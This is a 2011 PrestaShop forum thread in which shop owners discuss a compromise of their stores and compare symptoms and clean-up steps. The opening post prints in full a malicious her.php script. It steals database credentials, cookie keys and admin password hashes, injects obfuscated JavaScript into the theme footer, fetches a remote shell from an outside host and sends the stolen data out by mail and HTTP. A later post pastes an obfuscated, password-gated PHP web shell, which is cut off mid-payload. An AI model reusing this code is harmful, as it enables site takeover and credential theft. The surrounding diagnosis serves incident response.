Muller Posted August 23, 2011 Share Posted August 23, 2011 Hi all, I use an SCM system, I was just about to commit some files when I see in the "unversioned" list of files a new file which I did not remember creating. It's called "her.php" and it sits under the modules directory. So I opened it with a php editor, and here is the content: <?php error_reporting(0); $shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=")."{/literal}"; $shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt"; $msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php"; $mails = "[email protected], [email protected]"; function deletedir($arg){ $d=opendir($arg); while($f=readdir($d)){ if($f!="."&&$f!=".."){ if(is_dir($arg."/".$f)) deletedir($arg."/".$f); else unlink($arg."/".$f); } } rmdir($arg);closedir($d);} @include("../config/settings.inc.php"); ///Host info $hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n"; ///Server info $srvvar = _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n"; ///GET admin mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_); mysql_selectdb(_DB_NAME_); $r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1"); while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";} //Wride sploit @deletedir("../tools/smarty/compile/"); @deletedir("../tools/smarty/cache/"); @deletedir("../tools/smarty_v2/"); @deletedir("../tools/smarty_v2/"); $fn = "../themes/"._THEME_NAME_."/footer.tpl"; $f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f); $ff = str_replace("</body>"," ".$shcode."</body>",$ff); $f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); if($rf>0) $wrres = "true"; else $wrres = "false"; //write shell $sh = file_get_contents($shurl); $shf = "../upload/".md5(date("r")).".php"; $f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f); $shf2 = "../download/".md5(date("r")).".php"; $f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f); @unlink("../download/.htaccess"); $msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n"; @mail($mails,"new shop",$msg); @file_get_contents($msgurl."?data=".base64_encode($msg)); @unlink(__FILE__); ?> That looks like they're emailing all the back office user/passwords to the two emails specified at the top of the code. Did someone hack into my computer and put this file there? What do you think guys? I'm running an anti-virus check obviously as I write this... 1 Link to comment Share on other sites More sharing options...
Burhan BVK Posted August 23, 2011 Share Posted August 23, 2011 Weird, I had the same file, created today. It could be a new exploit or a timed virus that downloads this file on a given day. This is definitely created specifically for prestashop. You should check your upload and download directories for php files, that are not named index.php. You should check your theme folder, footer.tpl file. It might have some new javascript at the end. This file does send the username and passwords of employees. But that is useless, the passwords are hashed so you can not use them for login. But it also sends your database user name and password. You might want to change them just in case. If your mysql server is accessible externally they will be able to login. Link to comment Share on other sites More sharing options...
Muller Posted August 23, 2011 Author Share Posted August 23, 2011 Thanks. I posted this on Reddit at: I'm getting help there. I discovered new files in the download and upload directory, as well as modifications in my theme's footer.tpl which I deleted. The file was only run on my localhost, not on the live server. Link to comment Share on other sites More sharing options...
Maxence de Flotte Posted August 23, 2011 Share Posted August 23, 2011 Hi, What is your hosting service? What is the ftp manager you used? (FileZilla?) Does this file was on local? Best regards, Link to comment Share on other sites More sharing options...
Muller Posted August 23, 2011 Author Share Posted August 23, 2011 The file was not placed on the live sever, only on my local machine. I'm running 1.4.3.0. Please go to the link I posted in my previous reply to Reddit.com, as some guys helped there finding out what the script actually does. The question is how it happened, and how we stop it from happening again. Link to comment Share on other sites More sharing options...
ruilong Posted August 23, 2011 Share Posted August 23, 2011 I have seen the same thing on another shop today. Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop i found. Link to comment Share on other sites More sharing options...
Muller Posted August 23, 2011 Author Share Posted August 23, 2011 I have seen the same thing on another shop today. Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop i found. The only modules I use are the ones that came with 1.4.3.0. The only module I downloaded from prestashop.com is their own authorize.net SIM module. That's the only module I installed that did not came with Prestashop already. Link to comment Share on other sites More sharing options...
FlyHigh Posted August 23, 2011 Share Posted August 23, 2011 I just started using PrestaShop a few days ago to discover what's it all about - It works great, despite the hack today: * working on an online server, the public_html was protected by .htaccess (this protection was disabled when I found out about it). * I can't find her.php on the server anymore (in the apache-log I can see it) Is there any more information I can give to help out what this caused? * PrestaShop: 1.4.4.0 * Theme: Matrice Link to comment Share on other sites More sharing options...
Mike Kranzler Posted August 23, 2011 Share Posted August 23, 2011 Hi Muller, First of all, I want to let you know that we take this sort of situation extremely seriously, and have already assigned it as the top priority to our most qualified developer, Maxence (who as you can see, is already on the case). He is investigating it to try to locate the source, even if it is from an external module. If you would like to speak with him directly, we invite you to MP him to give him any additional information that could be helpful. I will let you know as soon as I receive more news, but please just know that we are working very hard to ensure that this will not happen again, not to you or anyone else in the PrestaShop community. -Mike Link to comment Share on other sites More sharing options...
thehandlestudio Posted August 23, 2011 Share Posted August 23, 2011 I have also had the same thing happen tonight about 1 hour ago and I am looking for the source. I think hta access files have been added as well as a script in the download folder but i can't open it. Regards, Mark. Link to comment Share on other sites More sharing options...
Mike Kranzler Posted August 23, 2011 Share Posted August 23, 2011 We're working to find the solution for you, but in the meantime, you may want to check the suggestions posted on the reddit link that Muller posted near the top. Take those suggestions with a grain of salt, but they may be worth exploring on your local machine after a back-up. -Mike Link to comment Share on other sites More sharing options...
FlyHigh Posted August 23, 2011 Share Posted August 23, 2011 I've checked the Apache Usage logs, couldn't find an other IP address than mine. There was a GET command to her.php ... [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304 ... In Download & Upload is a new file named: f48be302135d80a289c0e56fae37952e.php These files are also dated 23/aug 17:44 - the same time footer.tpl changed. Did it happen at the same time for everyone? Link to comment Share on other sites More sharing options...
designguy79 Posted August 23, 2011 Share Posted August 23, 2011 This also happened to me, running 1.4.3 I couldn't find the "her.php" but my footer.tpl was definitely changed. The only 3rd party module I had installed was jbx_menu. Did anyone else have this happen while running 1.4.4? Link to comment Share on other sites More sharing options...
kapowchis Posted August 23, 2011 Share Posted August 23, 2011 Also happening in 1.4.4 Link to comment Share on other sites More sharing options...
designguy79 Posted August 23, 2011 Share Posted August 23, 2011 Dang it, I hope they can find the source of the problem soon. Just launched the site live, otherwise I would take it down. Might have to anyway! Also, I am not familiar with the correct PrestaShop .htaccess file. How do I know what to remove from there? (I have cleaned everything else up) Link to comment Share on other sites More sharing options...
AKJV Posted August 23, 2011 Share Posted August 23, 2011 Wow, this looks serious. I discovered today that I have the same issue. I thought that I was the only with a compromised Prestashop installation, till I read this topic. I'm running a 1.4.4 version, updated from 1.4.3 Today, I saw that my FO was messed up: the Category block was empty, my slideshow stopped working and the footer has shifted upwards. When I use Firebug to check the html rendered code, I saw links to 2 external sites. I'm afraid I don't remember anymore which sites those were linking to... I checked my footer.tpl and found weird and suspicious code at the bottom. In addition, php files were added to the /upload and /download folders. Also, the .htaccess file (to deny access) in the /download folder was gone. In my case, this happened right after I've uploaded an html email file to my /mails/xx folder. This file was from someone else on the forum who I'm helping with an email layout problem. So my initial reaction was that this HTML file was somehow infected but seeing similar issues with others, I wonder if that's the case... I've attached both footer.tpl (with just the weird code) and one of added php files so the developers can have a look at it. compromised.zip Link to comment Share on other sites More sharing options...
Rolo Tomasi Posted August 23, 2011 Share Posted August 23, 2011 I'm running 1.4.4 and my site went down at 2:00pm UK time. My webhost has just pointed me to this thread and I have the same files added to my upload and download folders along with the addition to the footer.tpl file. Link to comment Share on other sites More sharing options...
kapowchis Posted August 23, 2011 Share Posted August 23, 2011 The footer.tpl file and a file named menu.3 within the "cache" folder from the "jbx_menu" module were modified at the same time, so i dont know if that´s relevant or not. Link to comment Share on other sites More sharing options...
AKJV Posted August 23, 2011 Share Posted August 23, 2011 I'm using jbx_menu as well... Can all the people who have posted here and encountered the same problem confirm that they are using this menu? Link to comment Share on other sites More sharing options...
Burhan BVK Posted August 23, 2011 Share Posted August 23, 2011 For anyone who finds a her.php file under their modules directory, you should do the following: - Check the file creation time, write this down and delete the file from your server. - Go to your apache raw access logs. You should be able to access it using hosting control panel. - Find the line that corresponds to the file creation time you wrote down earlier. - Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here. This data would help identify the root of the problem. To see if you have been attacked, check the following: - Is there any php file under your uploads or downloads directory apart from index.php? - Is there a strange javascript at the end of your footer.tpl file? If any of the above happens, change your mysql username and password. Link to comment Share on other sites More sharing options...
thehandlestudio Posted August 23, 2011 Share Posted August 23, 2011 I am not using that menu Link to comment Share on other sites More sharing options...
Rolo Tomasi Posted August 23, 2011 Share Posted August 23, 2011 I'm not using the jbx_menu module Link to comment Share on other sites More sharing options...
FlyHigh Posted August 23, 2011 Share Posted August 23, 2011 I'm not using JBX_menu! Strange thing is: I can't find anything in the log files about the new files created in the download and upload directory... Link to comment Share on other sites More sharing options...
AKJV Posted August 23, 2011 Share Posted August 23, 2011 Ok, at least we can rule out the jbx_menu as the source of the problem... Two more things. First, I didn't see a her.php file in my modules folder but still had the infected footer.tpl and the suspicious php files in upload and download folders. Second, I had a quick look at my downloaded PS 1.4.4 file (from the Prestashop website) and found a .DS_Store file in the root folder. If my memory serves me well, this a (hidden) archive file from MacOS systems. This file was thus also present on my server installation during my upgrade process. Probably not related to the issue but still worth mentioning it. Link to comment Share on other sites More sharing options...
geckoinfo Posted August 23, 2011 Share Posted August 23, 2011 Same thing for me.... I'm not using jbx_menu but JBSlider and JBVariousLinks. Prestashop 1.4.3 and same files in upload, dowload and code in footer.tpl into my theme folder. SQL password changed... and wait... Link to comment Share on other sites More sharing options...
FlyHigh Posted August 23, 2011 Share Posted August 23, 2011 The .DS_store is indeed from Mac, has probably nothing to do with the problem. About her.php: The file is automatically deleted, the TS was lucky to see it in time... Still: shouldn't you see every action in the apache log files? Like the creation of her.php, I can't find this. Or do you need different logfiles for this? (don't know much about those log files) Link to comment Share on other sites More sharing options...
aure58 Posted August 23, 2011 Share Posted August 23, 2011 Same things for me. I use PS 1.4.4, in local server (not live server) and code has been add in my theme footer.php Link to comment Share on other sites More sharing options...
Rolo Tomasi Posted August 23, 2011 Share Posted August 23, 2011 I have just checked a second store I run and this has not been effected by this issue. I havent got round to upgrading this store yet so it is still running version 1.3.7. It appears the issue only effects version 1.4 Link to comment Share on other sites More sharing options...
geckoinfo Posted August 23, 2011 Share Posted August 23, 2011 No problem in my another store in Prestashop 1.3.5 Link to comment Share on other sites More sharing options...
toktokcity Posted August 23, 2011 Share Posted August 23, 2011 Same problem in prestashop 1.4.4 with Matrice. This code was added. <?php if (isset($_GET['session2'])){ $auth_pass = "fa816edb83e95bf0c8da580bdfd491ef"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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